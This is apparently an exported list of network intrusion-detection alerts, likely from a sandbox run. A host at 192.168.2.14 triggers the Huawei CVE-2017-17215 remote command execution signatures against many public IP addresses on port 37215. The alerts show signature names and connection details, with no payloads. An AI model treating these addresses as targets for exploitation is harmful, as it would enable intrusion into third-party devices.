                                                    07/10/24-08:26:47.980953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327037215192.168.2.14157.200.27.99
                                                    07/10/24-08:26:15.862612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.14147.47.19.176
                                                    07/10/24-08:26:23.326882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384437215192.168.2.14197.124.128.230
                                                    07/10/24-08:26:45.690797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826037215192.168.2.14157.120.232.223
                                                    07/10/24-08:27:20.516215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935637215192.168.2.1441.3.33.89
                                                    07/10/24-08:26:26.584785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905637215192.168.2.1441.175.212.214
                                                    07/10/24-08:27:19.343381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828037215192.168.2.1441.52.145.55
                                                    07/10/24-08:26:25.467970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.14157.114.180.47
                                                    07/10/24-08:27:32.592658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413837215192.168.2.14197.139.75.4
                                                    07/10/24-08:26:41.367944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473237215192.168.2.14192.38.70.63
                                                    07/10/24-08:27:10.670765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811837215192.168.2.14157.100.88.144
                                                    07/10/24-08:26:20.186455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204037215192.168.2.14197.180.141.223
                                                    07/10/24-08:26:43.875785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345237215192.168.2.1441.234.53.42
                                                    07/10/24-08:26:13.824053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.1441.95.242.218
                                                    07/10/24-08:27:20.518150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693437215192.168.2.1441.9.133.113
                                                    07/10/24-08:26:25.503174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748637215192.168.2.1475.28.141.169
                                                    07/10/24-08:26:55.390670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833037215192.168.2.1441.79.82.144
                                                    07/10/24-08:26:29.785606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853837215192.168.2.1441.91.210.99
                                                    07/10/24-08:26:38.581201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993437215192.168.2.1441.43.146.6
                                                    07/10/24-08:26:11.167098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718637215192.168.2.1441.216.54.185
                                                    07/10/24-08:26:22.300019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586637215192.168.2.1441.188.219.164
                                                    07/10/24-08:26:34.238024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465037215192.168.2.1441.16.105.84
                                                    07/10/24-08:27:28.126957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462037215192.168.2.14157.68.52.20
                                                    07/10/24-08:26:45.681028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444037215192.168.2.149.45.243.107
                                                    07/10/24-08:26:13.849744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969637215192.168.2.14197.222.209.183
                                                    07/10/24-08:26:49.819552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686837215192.168.2.1441.67.72.38
                                                    07/10/24-08:27:11.477430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790237215192.168.2.14197.33.37.151
                                                    07/10/24-08:26:57.521887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999837215192.168.2.14157.35.212.228
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042637215192.168.2.14197.145.119.131
                                                    07/10/24-08:27:07.401938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077437215192.168.2.14197.16.29.195
                                                    07/10/24-08:27:33.907350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484437215192.168.2.1441.8.16.15
                                                    07/10/24-08:27:17.027039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393637215192.168.2.1441.3.79.212
                                                    07/10/24-08:26:29.862669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453837215192.168.2.14197.9.183.81
                                                    07/10/24-08:26:43.896856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805637215192.168.2.14197.224.17.237
                                                    07/10/24-08:27:02.848465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966237215192.168.2.1441.1.60.122
                                                    07/10/24-08:27:22.824361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694837215192.168.2.14128.35.19.161
                                                    07/10/24-08:26:11.565192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435437215192.168.2.14197.99.88.80
                                                    07/10/24-08:26:11.609085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967037215192.168.2.1441.172.189.79
                                                    07/10/24-08:27:07.292595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484237215192.168.2.14197.249.23.246
                                                    07/10/24-08:27:11.513310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787037215192.168.2.14210.222.179.78
                                                    07/10/24-08:26:23.359612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584437215192.168.2.1441.57.12.136
                                                    07/10/24-08:26:59.652707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201637215192.168.2.1441.151.35.46
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733237215192.168.2.14197.212.209.11
                                                    07/10/24-08:27:07.356358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358637215192.168.2.1441.32.228.217
                                                    07/10/24-08:27:23.903843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572237215192.168.2.14197.180.237.50
                                                    07/10/24-08:27:24.863618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717637215192.168.2.1423.101.144.46
                                                    07/10/24-08:26:55.437797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761837215192.168.2.14118.60.108.22
                                                    07/10/24-08:26:42.454249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918237215192.168.2.1441.186.70.189
                                                    07/10/24-08:26:31.102674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965237215192.168.2.14157.225.112.93
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745437215192.168.2.1441.133.202.58
                                                    07/10/24-08:27:17.074634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954637215192.168.2.14157.190.224.54
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611037215192.168.2.14157.62.253.3
                                                    07/10/24-08:26:43.668862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124637215192.168.2.1441.180.235.182
                                                    07/10/24-08:27:19.271006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952037215192.168.2.1441.120.91.246
                                                    07/10/24-08:27:19.205776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710037215192.168.2.1441.78.100.251
                                                    07/10/24-08:27:23.499663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242637215192.168.2.1441.223.93.222
                                                    07/10/24-08:26:11.558206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046037215192.168.2.1425.174.195.250
                                                    07/10/24-08:26:57.620930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668437215192.168.2.1441.48.39.234
                                                    07/10/24-08:27:24.981965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266637215192.168.2.14197.59.117.157
                                                    07/10/24-08:27:33.881994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269037215192.168.2.14157.75.8.200
                                                    07/10/24-08:26:55.372115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975037215192.168.2.1441.228.180.44
                                                    07/10/24-08:27:08.431901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750837215192.168.2.1436.107.47.7
                                                    07/10/24-08:26:48.023936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844237215192.168.2.1441.89.243.217
                                                    07/10/24-08:26:29.872230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794037215192.168.2.1441.132.158.78
                                                    07/10/24-08:26:25.420167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497237215192.168.2.14157.148.240.18
                                                    07/10/24-08:27:28.156684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634437215192.168.2.14179.117.125.253
                                                    07/10/24-08:27:24.903718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693037215192.168.2.14197.128.219.229
                                                    07/10/24-08:26:34.249351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162237215192.168.2.14157.254.47.112
                                                    07/10/24-08:26:15.856531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419837215192.168.2.14157.151.205.236
                                                    07/10/24-08:26:29.883376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519437215192.168.2.1441.69.50.232
                                                    07/10/24-08:26:29.887224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735437215192.168.2.1441.160.56.165
                                                    07/10/24-08:27:20.509874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090037215192.168.2.14157.71.77.198
                                                    07/10/24-08:26:15.805311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594237215192.168.2.14197.90.185.113
                                                    07/10/24-08:26:36.388728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290437215192.168.2.1441.184.173.247
                                                    07/10/24-08:26:43.910396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778437215192.168.2.14197.129.70.213
                                                    07/10/24-08:26:41.525899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.14222.125.5.168
                                                    07/10/24-08:26:59.661745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947437215192.168.2.14157.82.23.132
                                                    07/10/24-08:27:17.088022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768837215192.168.2.1441.119.16.66
                                                    07/10/24-08:26:38.625504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050037215192.168.2.14157.213.169.228
                                                    07/10/24-08:26:59.778453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705837215192.168.2.14197.38.62.226
                                                    07/10/24-08:27:05.188793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146437215192.168.2.14197.95.178.126
                                                    07/10/24-08:26:47.766848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896637215192.168.2.1441.170.42.206
                                                    07/10/24-08:27:07.369689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.14157.17.43.7
                                                    07/10/24-08:27:22.464589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893437215192.168.2.1441.10.223.41
                                                    07/10/24-08:27:24.999763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270437215192.168.2.14157.67.243.231
                                                    07/10/24-08:27:30.562058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878437215192.168.2.14197.175.225.33
                                                    07/10/24-08:26:20.110888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971237215192.168.2.14157.205.3.145
                                                    07/10/24-08:26:59.595205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956437215192.168.2.14197.168.67.163
                                                    07/10/24-08:26:49.898002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.14197.141.29.190
                                                    07/10/24-08:26:14.816754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573037215192.168.2.1450.190.53.50
                                                    07/10/24-08:27:17.102138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461037215192.168.2.14157.151.183.98
                                                    07/10/24-08:26:59.667282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696237215192.168.2.1441.136.212.103
                                                    07/10/24-08:26:14.817942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.14173.74.178.59
                                                    07/10/24-08:26:13.745015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656637215192.168.2.14197.103.201.75
                                                    07/10/24-08:26:49.824004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316237215192.168.2.14197.150.15.193
                                                    07/10/24-08:26:42.427217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765837215192.168.2.14157.1.115.88
                                                    07/10/24-08:26:33.165723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.14197.41.66.71
                                                    07/10/24-08:26:11.620952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451637215192.168.2.1441.70.197.249
                                                    07/10/24-08:27:02.980089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563837215192.168.2.1420.84.171.4
                                                    07/10/24-08:27:27.058736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683437215192.168.2.14197.46.132.24
                                                    07/10/24-08:26:42.367080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041437215192.168.2.14197.83.223.197
                                                    07/10/24-08:26:49.904886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258637215192.168.2.1441.120.169.203
                                                    07/10/24-08:26:47.832991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578637215192.168.2.14197.241.245.243
                                                    07/10/24-08:27:10.600336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219237215192.168.2.14157.186.86.10
                                                    07/10/24-08:27:14.875124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532637215192.168.2.1441.132.222.247
                                                    07/10/24-08:26:36.431557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504037215192.168.2.14208.109.99.65
                                                    07/10/24-08:26:20.159538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165237215192.168.2.14157.217.111.216
                                                    07/10/24-08:26:41.476455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315037215192.168.2.1441.148.192.109
                                                    07/10/24-08:27:27.112461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14197.55.237.162
                                                    07/10/24-08:27:28.162130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496437215192.168.2.14205.52.159.19
                                                    07/10/24-08:26:48.020359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440237215192.168.2.14157.114.105.124
                                                    07/10/24-08:27:19.303785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411637215192.168.2.14135.205.150.102
                                                    07/10/24-08:27:31.521527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.14197.4.11.165
                                                    07/10/24-08:26:23.301288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530637215192.168.2.14197.227.39.8
                                                    07/10/24-08:26:29.842425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326037215192.168.2.14197.56.106.65
                                                    07/10/24-08:27:05.172720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.1441.216.26.237
                                                    07/10/24-08:27:20.431094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888037215192.168.2.14157.185.53.20
                                                    07/10/24-08:26:57.650012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632437215192.168.2.14157.106.34.39
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290437215192.168.2.1441.236.244.59
                                                    07/10/24-08:27:34.133115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700237215192.168.2.14197.150.29.130
                                                    07/10/24-08:26:28.929759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280837215192.168.2.14157.167.168.94
                                                    07/10/24-08:26:22.288558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524037215192.168.2.1441.200.6.239
                                                    07/10/24-08:27:28.138788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465237215192.168.2.14197.11.10.200
                                                    07/10/24-08:27:02.742561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350037215192.168.2.14157.91.42.113
                                                    07/10/24-08:26:25.520266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996037215192.168.2.14161.147.15.98
                                                    07/10/24-08:26:55.400530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587637215192.168.2.14184.204.116.153
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382037215192.168.2.14157.92.58.216
                                                    07/10/24-08:27:22.917695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424637215192.168.2.1441.162.211.133
                                                    07/10/24-08:27:02.893845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229237215192.168.2.14157.57.218.13
                                                    07/10/24-08:26:14.810529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355437215192.168.2.14197.132.153.201
                                                    07/10/24-08:26:38.596946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161237215192.168.2.14197.201.226.144
                                                    07/10/24-08:26:45.660346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985637215192.168.2.14197.144.10.27
                                                    07/10/24-08:26:48.024550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719037215192.168.2.1489.159.36.55
                                                    07/10/24-08:26:57.619989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376837215192.168.2.14197.9.77.107
                                                    07/10/24-08:26:38.614472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541037215192.168.2.1476.86.231.5
                                                    07/10/24-08:27:27.112829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245037215192.168.2.14157.11.8.10
                                                    07/10/24-08:26:28.860348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314037215192.168.2.1441.195.234.105
                                                    07/10/24-08:26:18.009286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691437215192.168.2.14161.131.69.187
                                                    07/10/24-08:26:52.021127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979237215192.168.2.14130.121.199.221
                                                    07/10/24-08:26:55.440682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493837215192.168.2.1441.190.47.56
                                                    07/10/24-08:26:51.996552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846837215192.168.2.14157.101.37.103
                                                    07/10/24-08:26:25.474823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659037215192.168.2.1461.48.216.173
                                                    07/10/24-08:26:38.641903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350637215192.168.2.14197.52.32.75
                                                    07/10/24-08:26:34.233707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332637215192.168.2.1441.243.98.14
                                                    07/10/24-08:27:24.993210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692237215192.168.2.1497.11.234.128
                                                    07/10/24-08:26:23.360287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436037215192.168.2.14197.99.68.93
                                                    07/10/24-08:27:23.953541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831037215192.168.2.1441.71.171.17
                                                    07/10/24-08:26:47.869389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452037215192.168.2.1441.179.245.32
                                                    07/10/24-08:26:23.347841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373237215192.168.2.14114.100.119.136
                                                    07/10/24-08:27:08.426882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774837215192.168.2.14197.14.123.101
                                                    07/10/24-08:26:33.249834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323037215192.168.2.1441.6.84.175
                                                    07/10/24-08:26:49.858364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581237215192.168.2.1441.215.24.13
                                                    07/10/24-08:27:13.834773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229837215192.168.2.14157.89.108.221
                                                    07/10/24-08:26:52.090414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631837215192.168.2.14197.217.153.243
                                                    07/10/24-08:26:23.350538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171637215192.168.2.14197.112.18.42
                                                    07/10/24-08:27:10.585951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207037215192.168.2.1441.210.6.203
                                                    07/10/24-08:26:13.645814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260037215192.168.2.1487.206.189.34
                                                    07/10/24-08:26:26.547327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506837215192.168.2.14157.177.220.239
                                                    07/10/24-08:26:33.175813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552837215192.168.2.14157.204.218.82
                                                    07/10/24-08:26:43.537049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598837215192.168.2.1441.127.196.53
                                                    07/10/24-08:26:41.507922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824437215192.168.2.14157.19.221.167
                                                    07/10/24-08:26:41.556012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312237215192.168.2.14114.34.168.204
                                                    07/10/24-08:27:10.542013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.14197.69.182.34
                                                    07/10/24-08:27:30.416774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082437215192.168.2.1441.37.83.78
                                                    07/10/24-08:27:11.531009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636837215192.168.2.1441.37.70.28
                                                    07/10/24-08:26:11.485885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561837215192.168.2.14157.52.181.205
                                                    07/10/24-08:27:10.537865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001237215192.168.2.1441.196.213.89
                                                    07/10/24-08:26:17.989759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402037215192.168.2.14210.220.119.204
                                                    07/10/24-08:27:13.972304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038837215192.168.2.14159.58.227.109
                                                    07/10/24-08:26:41.517313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620037215192.168.2.14203.19.194.80
                                                    07/10/24-08:26:20.128612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044037215192.168.2.14197.182.41.199
                                                    07/10/24-08:26:13.776398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.14187.145.136.229
                                                    07/10/24-08:26:23.328619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055037215192.168.2.14197.25.186.29
                                                    07/10/24-08:27:33.832260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705237215192.168.2.14197.123.170.66
                                                    07/10/24-08:26:20.167079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239037215192.168.2.14197.114.75.121
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557437215192.168.2.14157.27.208.113
                                                    07/10/24-08:27:28.045782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125037215192.168.2.14146.75.89.59
                                                    07/10/24-08:27:31.553494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864637215192.168.2.14153.171.207.192
                                                    07/10/24-08:27:13.905026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659837215192.168.2.14157.10.193.230
                                                    07/10/24-08:27:11.562285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352437215192.168.2.1441.80.78.94
                                                    07/10/24-08:27:20.466175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458437215192.168.2.14197.113.92.12
                                                    07/10/24-08:27:08.427949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382037215192.168.2.1441.59.91.80
                                                    07/10/24-08:27:11.475374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691837215192.168.2.1441.166.218.195
                                                    07/10/24-08:27:28.042131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672837215192.168.2.14197.73.108.202
                                                    07/10/24-08:27:13.867297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.14157.207.123.151
                                                    07/10/24-08:26:29.790185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567837215192.168.2.14197.194.132.215
